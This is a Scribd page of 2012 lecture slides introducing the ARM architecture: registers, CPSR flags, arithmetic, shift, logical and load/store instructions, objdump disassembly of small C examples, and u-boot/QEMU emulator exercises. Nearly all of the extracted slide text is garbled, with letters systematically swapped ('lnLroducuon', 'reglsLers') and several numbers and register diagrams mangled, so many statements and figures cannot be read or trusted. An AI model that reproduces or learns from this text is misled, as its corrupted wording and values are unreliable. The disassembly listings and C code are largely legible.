[go: up one dir, main page]

0% found this document useful (0 votes)
141 views203 pages

Introduction To ARM Systems-11!17!2012

This document provides an introduction to the ARM (Acorn/Advanced RISC Machines) architecture. It discusses the history and development of ARM, the different ARM architecture versions, key features like registers and instruction cycles. It also outlines the tools that will be used like the GCC compiler and GAS assembler. The schedule includes labs on topics like Fibonacci, atomic operations and interrupts. QEMU will be used to emulate an ARM Cortex-A9 board for hands-on exercises including booting Linux with u-boot.

Uploaded by

AchintyaDesai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
141 views203 pages

Introduction To ARM Systems-11!17!2012

This document provides an introduction to the ARM (Acorn/Advanced RISC Machines) architecture. It discusses the history and development of ARM, the different ARM architecture versions, key features like registers and instruction cycles. It also outlines the tools that will be used like the GCC compiler and GAS assembler. The schedule includes labs on topics like Fibonacci, atomic operations and interrupts. QEMU will be used to emulate an ARM Cortex-A9 board for hands-on exercises including booting Linux with u-boot.

Uploaded by

AchintyaDesai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 203

lnLroducuon Lo A8M (Acorn/

Advanced 8lsc Machlnes)


Cananand klnl

!une 18 2012
1
AcknowledgemenLs
rof. 8a[eev Candhl, uepL. LCL, Carnegle Mellon
unlverslLy
rof. uave C'Pallaron, School of CS, Carnegle Mellon
unlverslLy
xeno kovah
uana PuLchlnson
uave keppler
!lm lrvlng
uave WelnsLeln
Ceary Suuereld
.
2
Co-requlslLes
lnLro x86
lnLermedlaLe x86 - would be very helpful
3
8ook(s)
A8M SysLem ueveloper's Culde: ueslgnlng
and Cpumlzlng SysLem Soware" by Andrew
n. Sloss, uomlnlc Symes, and Chrls WrlghL
4
Schedule
uay 1 arL 1
lnLro Lo A8M baslcs
Lab 1 (llbonaccl Lab)
uay 1 arL 2
More of A8Ms feaLures
Lab 2 (8CM8 Lab)
uay 2 arL 1
A8M hardware feaLures
Lab 3 (lnLerrupLs lab)
uay 2 arL 1.3
CCC opumlzauon
Lab 4 (ConLrol llow Pl[ack Lab)
uay 2 arL 2
lnllne and Mlxed assembly
ALomlc lnsLrucuons
Lab 3 (ALomlc Lab)
3
!"# % &"'( %
6
lnLroducuon
SLarLed as a hobby ln mlcroconLrollers ln hlgh
school wlLh roboucs
8ackground ln soware developmenL and
elecLrlcal englneerlng
ln school, Look many courses relaLed Lo mlcro
conLrollers and compuLer archlLecLure
Small amounL of experlence wlLh assembly
7
CbllgaLory xkCu
Source: hup://xkcd.com/676/
8
ShorL 8evlew
short ByteMyShorts[2] = {0x3210, 0x7654} in little endian?
Answer: 0x10325476
int NibbleMeInts = 0x4578 in binary, in octal? (no endianness involved)
Answers: 0b0100 0101 0111 1000
0b0 100 010 101 111 000
0o42570 (Take 3 bits of binary and represent in decimal)
Twos complement of 0x0113
Answer: 0xFEED
What does the following code do? (Part of output from gcc at O3)
movl (%rsi), %edx
movl (%rdi), %eax
xorl %edx, %eax
xorl %eax, %edx
xorl %edx, %eax
movl %edx, (%rsi)
movl %eax, (%rdi)
ret

How can we optimize above for code size?
Could this macro be used for atomic operations?
9
We'll learn how and why
int main(void) {
printf(Hello world!\n);
return 0;
}
1hls Lurns lnLo.
10
And Lhen lnLo Lhe followlng
11
CeneraLed uslng ob[dump
lnLroducuon Lo A8M
Acorn CompuLers LLd. (Cambrldge, Lngland) nov. 1990
llrsL called Acorn 8lSC Machlne, Lhen Advanced 8lSC
Machlne
8ased on 8lSC archlLecLure work done aL uCal 8erkley
and SLanford
A8M only sells llcenses for lLs core archlLecLure deslgn
Cpumlzed for low power & performance
versauleLxpress board wlLh CorLex-A9 (A8Mv7) core
wlll be emulaLed" uslng Llnaro bullds.
1hls also means some Lhlngs may noL work. ?ou've
been warned.

12
A8M archlLecLure verslons
")*+,-.*-/). 012,34
A8Mv1 A8M1
A8Mv2 A8M2, A8M3
A8Mv3 A8M6, A8M7
A8Mv4 SLrongA8M, A8M71uMl, A8M91uMl
A8Mv3 A8M7L!, A8M9L, A8M10L, xscale
A8Mv6 A8M11, A8M CorLex-M
A8Mv7 A8M CorLex-A, A8M CorLex-M, A8M CorLex-8
A8Mv8 noL avallable yeL. Wlll supporL 64-blL addresslng
+ daLa
A8M ArchlLecLure." Wlklpedla, 1he lree Lncyclopedla. Wlklmedla
loundauon, lnc. 3 March 2012. Web. 3 March 2012.
13
A8M LxLra leaLures
Slmllar Lo 8lSC archlLecLure (noL purely 8lSC)
varlable cycle lnsLrucuons (Lu/S18 muluple)
lnllne barrel shler
16-blL (1humb) and 32-blL lnsLrucuon seLs comblned called
1humb2
Condluonal execuuon (reduces number of branches)
AuLo-lncremenL/decremenL addresslng modes
Changed Lo a Modled Parvard archlLecLure slnce A8M9
(A8Mv3)
LxLenslons (noL covered ln Lhls course):
1rusLZone
vl, nLCn & SlMu (uS & Mulumedla processlng)
14
8eglsLers
1oLal of 37 reglsLers avallable (lncludlng
banked reglsLers):
30 general purpose reglsLers
1 C (program-counLer)
1 CS8 (CurrenL rogram SLaLus 8eglsLer)
3 SS8 (Saved rogram SLaLus 8eglsLer)
1he saved CS8 for each of Lhe ve excepuon modes
Several excepuon modes
lor now we wlll refer Lo user" mode
13
8eglsLers
r0
r1
r2
r3
r4
r3
r6
r7
r8
r9
810 (SL)
r11 (l)
r12 (l)
r13 (S)
r14 (L8)
CS8
r13 (C)
SLack olnLer (S) - 1he address of Lhe Lop elemenL of sLack.

Llnk 8eglsLer (L8) - 8eglsLer used Lo save Lhe C when enLerlng a
subrouune.

rogram CounLer (C) - 1he address of 5.6- lnsLrucuon. (A8M
mode polnLs Lo currenL+8 and 1humb mode polnLs Lo currenL+4)

CurrenL rogram SLaLus 8eglsLer (CS8) - 8esulLs of mosL recenL
operauon lncludlng llags, lnLerrupLs (Lnable/ulsable) and Modes

812 or l ls noL lnsLrucuon polnLer, lL ls Lhe lnLra procedural call
scraLch reglsLer

16
lnsLrucuon cycle
leLch - feLch
nexL lnsLrucuon
from memory
uecode -
decode feLched
lnsLrucuon
LxecuLe -
execuLe feLched
lnsLrucuon
SLarL
Lnd
17
A8M vs. x86
Lndlanness (8l-Lndlan)
lnsLrucuons are llule endlan (excepL on Lhe -8 prole for A8Mv7
where lL ls lmplemenLauon dened)
uaLa endlanness can be mlxed (depends on Lhe L blL ln CS8)
llxed lengLh lnsLrucuons
lnsLrucuon operand order ls generally: C uLS1, S8C (A1&1 synLax)
ShorL lnsLrucuon execuuon umes
8eglsLer dlerences (CS8, SS8.)
Pas a few exLra reglsLers
Cperauons only on reglsLers noL memory (Load/SLore archlLecLure)
lpellnlng & lnLerrupLs
Lxcepuons
rocessor Modes
Code & Compller opumlzauons due Lo Lhe above dlerences
18
A8M uaLa slzes and lnsLrucuons
A8Ms mosLly use 16-blL (1humb) and 32-blL
lnsLrucuon seLs
32-blL archlLecLure
8yLe = 8 blLs (nlbble ls 4 blLs) [byLe or char ln x86]
Palf word = 16 blLs (Lwo byLes) [word or shorL ln MS
x86]
Word = 32 blLs (four byLes) [uoubleword or lnL/long ln
MS x86]
uouble Word = 64 blLs (elghL byLes) [Cuadword or
double/long long ln MS x86]
Source:
hup://sLackoverow.com/quesuons/39419/vlsual-c-how-large-ls-a-
dword-wlLh-32-and-64-blL-code
19
1he Llfe of 8lnarles
SLarLs wlLh c or cpp source code wrluen by us
A *728,3.) Lakes Lhe source code and generaLes
assembly lnsLrucuons
An 199.2:3.) Lakes Lhe assembly lnsLrucuons and
generaLes ob[ecLs or .o les wlLh machlne code
1he 3,5;.) Lakes ob[ecLs and arranges Lhem for
execuuon and generaLes an execuLable. (A dynamlc
llnker wlll lnserL ob[ecL code durlng runume ln
memory)
A 371<.) prepares Lhe blnary code and loads lL lnLo
memory for CS Lo run
20
1he Lools we wlll use
Compller - gcc for A8M
Assembler - gcc or as (gas) for A8M
Llnker - gcc for A8M or gold
Loader - gcc for A8M and ld-llnux for A8M
21
AL ower on.
8CM has code LhaL has been burned ln by SoC
vendor (slmllar Lo 8lCS buL noL Lhe same)
use of memory mapped lC
dlerenL memory componenLs (can be a mlx of 8CM,
S8AM, Su8AM eLc.)
ConLalns
Code for memory conLroller seLup
Pardware and perlpheral lnlL (such as clock and umer)
A booL loader such as lasLbooL, u-booL, x-Loader eLc.
22
u-8ooL process
Source: 8alduccl, lrancesco.hup://balau82.wordpress.com/2010/04/12/booung-llnux-wlLh-u-booL-on-qemu-arm/
23
u-booL exerclse on a versaule 8
8un Lhe followlng ln ~/pro[ecLs/ubooL-
exerclse:
qemu-system-arm -M versatilepb -m 128M -kernel flash.bin -serial stdio
ash.bln conLalns:
u-booL blnary (aL 0x10000 ln lmage)
a rooL lesysLem (aL 0x210000 ln lmage)
Lhe llnux kernel (aL 0x410000 ln lmage)
u-booL has booLm <address> Lo booL code
Source: 8alduccl, lrancesco.hup://balau82.wordpress.com/2010/04/12/booung-llnux-wlLh-u-booL-on-qemu-arm/
24
u-booL exerclse
u-booL was paLched ln earller example b/c lL
dld noL supporL ramdlsk usage wlLh booLm
command. Cood 'nough for slmulauon.
u-booL uses booLm <kernel address> <roous
lmage address> Lo booL
u-booL relocaLes lLself Lo speclc address
(0x1000000) before loadlng kernel.
Source: 8alduccl, lrancesco.hup://balau82.wordpress.com/2010/04/12/booung-llnux-wlLh-u-booL-on-qemu-arm/
23
8x w/ CorLex-A9 Memory Map
26
Source:
hup://lnfocenLer.arm.com/help/lndex.[sp?Loplc=/com.arm.doc.dul0440b/8ba[lhec.hLml
CorLex M3 Memory Map
Source: hup://www.[oral.ca/blog/wp-conLenL/uploads/2009/10/CorLexrlmer.pdf
27
A8M ArchlLecLure
28
Source: hup://www.arm.com/les/pdf/armcorLexa-9processors.pdf
lnsLrucuon cycle
leLch - feLch
nexL lnsLrucuon
from memory
uecode -
decode feLched
lnsLrucuon
LxecuLe -
execuLe feLched
lnsLrucuon
SLarL
Lnd
29
8ehavlor of Lhe C/813
C - rogram counLer (llke Lhe x86 Ll) has Lhe
address of nexL lnsLrucuon Lo execuLe
When execuung an A8M lnsLrucuon, C reads as
Lhe address of currenL lnsLrucuon + 8
When execuung a 1humb lnsLrucuon, C reads as
Lhe address of currenL lnsLrucuon + 4
When C ls wrluen Lo, lL causes a branch Lo Lhe
wrluen address
1humb lnsLrucuons cannoL access/modlfy C
dlrecLly
30
1haL means.

00008380 <add>:
8380: b480 push {r7}
8382: b083 sub sp, #12
8384: af00 add r7, sp, #0
8386: 6078 str r0, [r7, #4]
8388: 6039 str r1, [r7, #0]
838a: 687a ldr r2, [r7, #4]
838c:683b ldr r3, [r7, #0]
838e: 18d3 adds r3, r2, r3
8390: 4618 mov r0, r3
8392: f107 070c add.w r7, r7, #12
8396: 46bd mov sp, r7
8398: bc80 pop {r7}
839a: 4770 bx lr
=+.5 .6.*/>5?
,59-)/*>75 @ 6ABAC
&DEF6FFFFABAG
31
A8M Assembly and some convenuons
now uses unled Assembly Language (comblnes A8M &
1humb lnsLrucuon seLs and code allowed Lo have lnLermlxed
lnsLrucuons)
Ceneral form (Lhere are excepuons Lo Lhls):
<Instruction><Conditional>{S bit} <destination> <source> <Shift/
operand/immediate value>
Load/SLore archlLecLure means lnsLrucuons only operaLe on
reglsLers, nC1 memory
MosL of Lhe lnsLrucuons expecL desunauon rsL followed by
source, buL noL all.
32
A8M Assembly and some convenuons
conLd.
<dsL> wlll be desunauon reglsLer
<src> wlll be source reglsLer
<reg> wlll be any specled reglsLer
<lmm> wlll be lmmedlaLe value
<reg|cxfz..> whaLever follows '|' means wlLh
Lhe specled ag enabled
33
Condluonal llags
lndlcaLe lnformauon abouL Lhe resulL of an operauon
n - negauve resulL recelved from ALu (8lL 31 of Lhe resulL
lf lL ls Lwo's complemenL slgned lnLeger)
Z - Zero ag (1 lf resulL ls zero)
C - Carry generaLed by ALu
v - overow generaLed by ALu (1 means overow)
C -overow or saLurauon generaLed by ALu (Sucky ag
seL unul CS8 ls overwrluen manually)
llags are ln a speclal reglsLer called CS8 (CurrenL rogram
SLaLus 8eglsLer)
llags are noL updaLed unless used wlLh a sux of S on
lnsLrucuon
34
CurrenL/Appllcauon rogram SLaLus
8eglsLer (CS8/AS8)
3
1

n
3
0

Z
2
9

C
2
8

v
2
7

C
2
6

2
3

2
4

2
3

2
2

2
1

2
0

1
9

1
8

1
7

1
6

1
3

1
4

1
3

1
2

1
1

1
0

9

L
8

A
7

l
6

l
3

1
4


3

M
2

C
1

u
0

L
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
33
ush and op operauons
uSP <reg llsL> - decremenLs Lhe S and
sLores Lhe value ln <reg llsL> aL LhaL locauon
C <reg llsL> - SLores Lhe value aL S lnLo
<reg llsL> and lncremenLs Lhe S
8oLh operauons only operaLe on S
36
uSP operauon
S
0x7Llll930
0x7Llll934
0x7Llll938
0x7Llll93C
0x7Llll938
0x00008330 0x00008330
lnS18uC1lCn: push r7, lr
0x0a012434 0x0a012434
0x00008330
0x0a012434
0x7Llll934
0x0A080C0u
0x00008010
87
L8
0x0A080C0u
0x00008010
0x0A080C0u
0x00008010
0x7Llll930
0x0A080C0u
0x00008010
0x0A080C0u
37
ArlLhmeuc operauons
Auu: add
<dsL> = <src> + <lmm> or <src> + <reg>
AuC: add wlLh carry
<dsL> = <src|c> + <lmm> or <src|c> + <reg>
Su8: subLracL
<dsL> = <src> - <lmm> or <src> - <reg>
S8C: subLracL wlLh carry
<dsL> = <src|c> - <lmm> or <src|c> - <reg>
8S8: reverse subLracL
<dsL> = <lmm> - <src> or <reg> - <src>
8SC: reverse subLracL wlLh carry
<dsL> = <lmm|c> - <src> or <reg|c> - <src>
38
Closer look aL Lxample 1.c
int main(void) {
int a, b, c;
a=10;
b=12;
c=add(a,b);
return 0;
}

int add(int a, int b)
{
return a+b;
}
00008354 <main>:
8354: b580 push {r7, lr}
8356: b084 sub sp, #16
8358: af00 add r7, sp, #0
835a: f04f 030a mov.w r3, #10
835e: 607b str r3, [r7, #4]
8360: f04f 030c mov.w r3, #12
8364: 60bb str r3, [r7, #8]
8366: 6878 ldr r0, [r7, #4]
8368: 68b9 ldr r1, [r7, #8]
836a: f000 f809 bl 8380 <add>
836e: 60f8 str r0, [r7, #12]
8370: f04f 0300 mov.w r3, #0
8374: 4618 mov r0, r3
8376: f107 0710 add.w r7, r7, #16
837a: 46bd mov sp, r7
837c: bd80 pop {r7, pc}
837e: bf00 nop

00008380 <add>:
8380: b480 push {r7}
8382: b083 sub sp, #12
8384: af00 add r7, sp, #0
8386: 6078 str r0, [r7, #4]
8388: 6039 str r1, [r7, #0]
838a: 687a ldr r2, [r7, #4]
838c: 683b ldr r3, [r7, #0]
838e: 18d3 adds r3, r2, r3
8390: 4618 mov r0, r3
8392: f107 070c add.w r7, r7, #12
8396: 46bd mov sp, r7
8398: bc80 pop {r7}
839a: 4770 bx lr
1he hlghllghLed lnsLrucuon ls a
speclal form of Su8. ln Lhls case
means:
S = S - 16

1humb lnsLrucuons are lnLermlxed
wlLh A8M lnsLrucuons.
39
S8C & 8S8 operauons
80 0x0000000A
lnS18uC1lCn: sbc r0, r0, r1 rsb r0, r0, r1
MLAnS : r0 = r0 - r1 - nC1(C) r0 = r1 - r0 (no ags updaLed)
0x0A080C0u
0x20000010
81
CS8
0x0A080C0u
80
81
CS8
0x0A080C0u
0xl3l4l3lu
0x20000010
0x20000010
0x20000010
0x0A080C0u
0x0A080C03
0x0000000A
40
8efore Cperauon
Aer Cperauon
ArlLhmeuc operauons parL 2
MuL: <dsL> = <reg1> <reg2>
MLA: <dsL> = (<reg1> <reg2>) + <reg3>
MLAS<c> <8d>, <8n>, <8m>, <8a> where <8d> ls
desunauon reglsLer, <8n> & <8m> are Lhe rsL and
second operands respecuvely and <8a> ls Lhe addend
reglsLer
MLS: <dsL> = <reg3> - (<reg1> <reg2>)
Muluply operauons only sLore leasL slgnlcanL 32
blLs of resulL lnLo desunauon
8esulL ls noL dependenL on wheLher Lhe source
reglsLer values are slgned or unslgned values

41
example2.c
000083b8 <multiply>:
83b8: fb01 f000 mul.w r0, r1, r0
83bc: 4770 bx lr
83be: bf00 nop

000083c0 <multiplyadd>:
83c0: fb01 2000 mla r0, r1, r0, r2
83c4: 4770 bx lr
83c6: bf00 nop
int main(void) {
int a, b, c, d;
a=2;
b=3;
c=4;
d = multiply(a,b);
printf(a * b is %d\n, d);
d = multiplyadd(a,b,c);
printf(a * b + c is %d\n, d);
return 0;
}

int multiply(int a, int b)
{
return (a*b);
}

Int multiplyadd(int a, int b, int c)
{
return ((a*b)+c);
}
42
MLA & MLS operauons
80 0x0000000A
lnS18uC1lCn: mla r0, r0, r1, r2 mls r0, r0, r1, r2
MLAnS : r0 = r0 r1 + r2 r0 = r2 - (r0 r1) (no ags updaLed)
0x0000000L
0x20000010
81
CS8
0x0000000L
80
81
CS8
0x0000000L
0x0000008l
0x20000010
0x20000010
0x20000010
0x0000000L
0xllllll77
0x0000000A
0x00000003 82 0x00000003
0x00000003 82 0x00000003
43
8efore Cperauon
Aer Cperauon
ArlLhmeuc operauons parL 3
Sulv - Slgned dlvlde
uulv - unslgned dlvlde
Cn Lhe CorLex-A prole Lhere ls no dlvlde
operauon
LLASL nC1L: 1hese lnsLrucuons are only avallable on CorLex-8 prole
44
Lxample x.s
000083e4 <divide>:
83e4: e710f110 sdiv r0, r0, r1
83e8: e12fff1e bx lr
83ec: e1a00000 nop ; (mov
r0, r0)

000083f0 <unsigneddivide>:
83f0: e730f110 udiv r0, r0, r1
83f4: e12fff1e bx lr
83f8: e1a00000 nop ; (mov
r0, r0)
43
uslng Lhe emulaLor
cd ~/projects/linaro
./startsim
Password is passw0rd
1o copy <localle> Lo </paLh/Lo/le> on emulaLor:
scp P 2200 <localfile> root@localhost:</path/to/file>
1o copy </paLh/Lo/le> from emulaLor Lo <localle>:
scp P 2200 root@localhost:</path/to/file> <localfile>
46
ob[dump lnLroducuon
dumps Lhe ob[ecLs ln an LLl (LxecuLable
Llnkable lormaL) le.
ob[ecLs LhaL are ln a form before Lhey are
llnked
-g gdb opuon for gcc adds debug symbols LhaL
ob[dump can read
-d opuon for ob[dump used for dlssassembllng
(geL assembly code from Lhe LLl formaL)
47
ob[dump usage
int main(void) {
printf(Hello world!\n);
return 0;
}
helloworld.c objdump d helloworld | less
48
1ry dlvldlng now on Lhe emulaLor
CoLo ~/pro[ecLs/examples
Copy example1 Lo dlvexample
8eplace Lhe add () funcuon ln example1.c wlLh
dlvlde and reLurn (a/b)
8un make clobber && make
ulsassemble.
ob[dump -d example1 | less
WhaL do you see?
49
nC lnsLrucuon
A mosL lnLeresung lnsLrucuon conslderlng lL does
noLhlng
A8M 8eference Manual menuons LhaL Lhls lnsLrucuon
does noL relaLe Lo code execuuon ume (lL can lncrease,
decrease or leave Lhe execuuon ume unchanged).
Why?
rlmary purpose ls for lnsLrucuon allgnmenL. (A8M and
1humb lnsLrucuons LogeLher. WhaL could go wrong?)
Can also be used as parL of vecLor Lables
ln some mlcroconLrollers, lL ls also used for
synchronlzauon of plpellne.
30
8arrel Shler
Pardware opumlzauon lnllne wlLh Lhe ALu allows for a mulupller
(power of 2) wlLhln same lnsLrucuon cycle
Allows for shllng a reglsLer value by elLher an unslgned lnLeger
(MAxvAL of 32) or a value specled ln bouom byLe of anoLher reglsLer.
AS8 - ArlLhmeuc Shl 8lghL (MS8 copled aL le, lasL blL o rlghL ls
Carry)
LSL - Loglcal Shl Le (0s aL rlghL, lasL blL o le ls Carry)
MCv 87, 83, LSL 2 means (87=834) or (83<<2)
Auu 80, 81, 81, LSL 1 means 80=81+(81<<1)
LS8 - Loglcal Shl 8lghL (0s aL le, lasL blL o rlghL ls Carry)
8C8 - 8oLaLe 8lghL (blLs popped o Lhe rlghL end, ls dlrecLly pushed
lnLo le, lasL blL o rlghL ls Carry)
88x - 8oLaLe 8lghL wlLh LxLend (blLs popped o Lhe rlghL end rsL go
lnLo Carry, Carry ls shled ln Lo le, lasL blL o rlghL ls Carry)
31
PlnLs on how Lo 81lM
S - updaLes ags ln Lhe CS8
<c> - allows mnemonlc of condluonal Lo be added
<q> - lnsLrucuon sux wlLh elLher:
.n narrow, assembler musL use 16-blL encodlng for
Lhe lnLrucuon
.W Wlde, assembler musL use 32-blL encodlng for Lhe
lnsLrucuon
uo noL use Lhe .n or .W ln your assembly code.
As per manual, lL wlll Lhrow errors. Cnu Assembler
decldes on encodlng dependlng on opuons selecLed.
32
Lxample 3.1.c
int main(void)
{
int a, b, d;
a = 6;
b = 8;
d = multiplybytwo(a) * multiplybytwo(b);
printf("2a * 2b is %d\n", d);

return 0;
}

int multiplybytwo(int a)
{
return a*2;
}
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: 22c0 movs r2, #192 ; 0xc0
831e: f248 4100 movw r1, #33792 ; 0x8400
8322: f2c0 0100 movt r1, #0
8326: f7ff efec blx 8300 <_init+0x3c>
832a: 2000 movs r0, #0
832c: bd08 pop {r3, pc}
832e: bf00 nop
000083a8 <multiplybytwo>:
83a8: 0040 lsls r0, r0, #1
83aa: 4770 bx lr
33
Lxample 3.2.c
int main(void)
{
int a, b, d;
a = -6;
b = 8;
d = dividebytwo(a) / dividebytwo(b);
printf("a/2 / b/2 is %d\n", d);

return 0;
}

int dividebytwo(int a)
{
return a/2;
}
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: 2200 movs r2, #0
831e: f248 4104 movw r1, #33796 ; 0x8404
8322: f2c0 0100 movt r1, #0
8326: f7ff efec blx 8300 <_init+0x3c>
832a: 2000 movs r0, #0
832c: bd08 pop {r3, pc}
832e: bf00 nop

000083a8 <dividebytwo>:
83a8: eb00 70d0 add.w r0, r0, r0, lsr #31
83ac: 1040 asrs r0, r0, #1
83ae: 4770 bx lr
34
Lxample 3.2.c
33
80 0xlllllll8
0x0000000L
0x20000010
81
CS8
80
81
CS8
0x0000000L
0xlllllll9
0xA0000010
0x00000003 82
0x00000003 82
add.w r0, r0, r0, lsr #31
asrs r0, r0, #1
80 0x00001000
0x0000000L
0x20000010
81
CS8
80
81
CS8
0x0000000L
0xlllllllC
0xA0000010
0x00000003 82
0x00000003 82
88x & LSL operauon
80 0x0000000A
lnS18uC1lCn: mvn r0, r0, 88x add r0, r0, r1, LSL 4
MLAnS : r0 = ~r0 >> 1 r0 = r0 + (r1 16) (no ags updaLed)
0x0000000L
0x20000010
81
CS8
0x0000000L
80
81
CS8
0x0000000L
0xlllllllA
0xA0000010
0x20000010
0x20000010
0x0000000L
0x000000LA
0x0000000A
0x00000003 82 0x00000003
0x00000003 82 0x00000003
36
More uaLa operauons
MCv - move value from one reglsLer Lo anoLher
Comblne wlLh posulxes Lo modlfy:
MCv1: Moves only Lop half word lnLo desunauon
wlLhouL changlng lower half word
MCvS C,<reg>: Moves value lnLo desunauon reglsLer
and updaLes CS8 ags
Mvn - 8lLwlse nC1 of value lnLo desunauon
reglsLer
CannoL be used on memory locauons
37
Lxample 4.c
int main(void)
{
int a, b, d;
a = 221412523;
b = 3;
d = multiply(a,b);
printf("a * b is %d\n", d);

return 0;
}

int multiply(int a, int b)
{
return (a*b);
}
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: f248 4108 movw r1, #33800 ; 0x8408
8320: f247 6201 movw r2, #30209 ; 0x7601
8324: f2c0 0100 movt r1, #0
8328: f2c2 7297 movt r2, #10135 ; 0x2797
832c: f7ff efe8 blx 8300 <_init+0x3c>
8330: 2000 movs r0, #0
8332: bd08 pop {r3, pc}

000083ac <multiply>:
83ac: fb01 f000 mul.w r0, r1, r0
83b0: 4770 bx lr
83b2: bf00 nop
2214123233 = 664237369 or
0x27977601
38
Lxample 6.c
Before the subtraction operation

CPSR = 0x60000010

After the subtraction operation

CPSR = 0x80000010
0000838c <main>:
838c: b590 push {r4, r7, lr}
838e: b085 sub sp, #20
8390: af00 add r7, sp, #0
8392: f04f 0306 mov.w r3, #6
8396: 60fb str r3, [r7, #12]
8398: f3ef 8400 mrs r4, CPSR
839c: 60bc str r4, [r7, #8]
839e: 68fa ldr r2, [r7, #12]
83a0: f243 535d movw r3, #13661 ; 0x355d
83a4: f6cf 73fd movt r3, #65533 ; 0xfffd
83a8: 18d3 adds r3, r2, r3
83aa: 607b str r3, [r7, #4]
83ac: f3ef 8400 mrs r4, CPSR
83b0: 603c str r4, [r7, #0]
83b2: f248 4344 movw r3, #33860 ; 0x8444
83b6: f2c0 0300 movt r3, #0
83ba: 4618 mov r0, r3
83bc: 6879 ldr r1, [r7, #4]
...
int main(void)
{
int a, b;
a = 6;
. . .
// Important: Subtraction taking place
b = a - 182947;
. . .
printf("a's negatory is %d\n", b);

return 0;
}
39
8everslng byLe order
8Lv - reverses byLe order (& endlanness) of
value ln reglsLer and sLores lnLo desunauon
reglsLer
8Lv16 - reverses byLe order of each 16-blL
halfword ln reglsLer and sLores lnLo
desunauon reglsLer
8LvSP - reverses byLe order of lower 16-blL
halfword ln reglsLer, slgn exLends Lo 32 blLs
and sLore lnLo desunauon reglsLer
60
8Lv & 8Lv16 operauons
80 0xA8CuuLll
lnS18uC1lCn: rev r0, r0 rev16 r0, r0
0x20000010 CS8
80
CS8 0x20000010
0x20000010
0x20000010
0xA8CuuLll
0xlluLCuA8 0xCuA8lluL
61
CurrenL rogram SLaLus 8eglsLer
3
1

n
3
0

Z
2
9

C
2
8

v
2
7

C
2
6

2
3

2
4

2
3

2
2

2
1

2
0

1
9

1
8

1
7

1
6

1
3

1
4

1
3

1
2

1
1

1
0

9

L
8

A
7

l
6

l
3

1
4


3

M
2

C
1

u
0

L
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
62
Loglcal & Comparlson operauons
Anu - 8lLwlse Anu
8lC - 8lLwlse blL clear
LC8 - 8lLwlse Lxcluslve C8
C88 - 8lLwlse C8
C8n - 8lLwlse C8 nC1
CM - Compare. Su8 buL wlLh HI <.9>51>75. (Same as Su8S)
CMn - Compare negauve. Auu buL wlLh HI <.9>51>75. (Same
as AuuS)
1LC - 1esL Lqulvalence. Llke LC8 buL wlLh HI <.9>51>75.
1S1 - 1esL. Llke Anu buL wlLh HI <.9>51>75.
63
Lxample 7.1.c

000083d0 <and>:
83d0: 4008 ands r0, r1
83d2: 4770 bx
int main(void)
{
int a, b, d;
a = 221412523;
b = 374719560;

d = and(a,b);

printf("a & b is %d\n", d);

return 0;
}

int and(int a, int b)
{
return (a&b);
}
64
Lxample 7.2.c
000083d0 <orr>:
83d0: 4308 orrs r0, r1
83d2: 4770 bx lr
int main(void)
{
int a, b, d;
a = 221412523;
b = 374719560;

d = orr(a,b);

printf("a | b is %d\n", d);

return 0;
}

int orr(int a, int b)
{
return (a|b);
}
63
Lxample 7.3.c
0000838c <main>:
<prolog> ...
8392: f04f 0308 mov.w r3, #8
8396: 60bb str r3, [r7, #8]
8398: f04f 0309 mov.w r3, #9
839c: 607b str r3, [r7, #4]
839e: f3ef 8400 mrs r4, CPSR
83a2: 603c str r4, [r7, #0]
83a4: 68ba ldr r2, [r7, #8]
83a6: 687b ldr r3, [r7, #4]
83a8: 4053 eors r3, r2
83aa: 2b00 cmp r3, #0
83ac: dd05 ble.n 83ba <main+0x2e>
83ae: 68b8 ldr r0, [r7, #8]
83b0: 6879 ldr r1, [r7, #4]
83b2: f000 f829 bl 8408 <add>
83b6: 60f8 str r0, [r7, #12]
83b8: e004 b.n 83c4 <main+0x38>
83ba: 6878 ldr r0, [r7, #4]
83bc: 68b9 ldr r1, [r7, #8]
83be: f000 f831 bl 8424 <subtract>
83c2: 60f8 str r0, [r7, #12]
<contd>...
int main(void)
{
int a, b, d;
a = 8;
b = 9;

if((a ^ b) > 0)
d = add(a,b);
else
d = subtract(b,a);

printf("a & b is %d\n", d);

return 0;
}

int add(int a, int b)
{
return (a+b);
}

int subtract(int a, int b)
{
return (a-b);
}
66
8lC
8lC clears Lhe blLs specled ln a mask
lor example,
80 = 0x37 or 0b0101 0111
81 = 0x24 or 0b0010 0100
8lC <82> <80> <81>
Means 82 = 80 & ~(81) = 0b0101 0011 or 0x33
Mask can also be a shled value (uslng Shl
operauons)
67
Memory operauons arL l
Lu8 - Load daLa from memory lnLo reglsLers
S18 - SLore daLa from reglsLers Lo memory
CaveaL: Lu8/S18 can load/sLore daLa on a
boundary allgnmenL LhaL ls Lhe same as Lhe
daLa Lype slze belng loaded/sLored.
Lu8 can only load 32-blL words on a memory
address LhaL ls muluples of 4 byLes.
68
Memory Cperauons arL l conLd.
Lu8 r0, [r1] loads r0 wlLh conLenLs of memory address
polnLed Lo by r1
S18 r0, [r1] sLores Lhe conLenLs of r0 Lo Lhe memory
address polnLed Lo by r1.
Warnlng: 1hls can be confuslng slnce desunauon ls acLually
specled ln Lhe second argumenL
Also Lu8 r0, [r1, 4] means
r0 = [r1 + 4] and r1 value remalns unchanged
Slmllarly S18 r0, [r1, 4] means
[r1+4] = r0 and r1 value remalns unchanged
1he above Lwo lnsLrucuons addresslng mode ls called
pre-lndexed addresslng
69
Lxample 8.c
0000838c <main>:
838c: b580 push {r7, lr}
838e: b084 sub sp, #16
8390: af00 add r7, sp, #0
8392: f04f 0308 mov.w r3, #8
8396: 607b str r3, [r7, #4]
8398: f04f 0309 mov.w r3, #9
839c: 60fb str r3, [r7, #12]
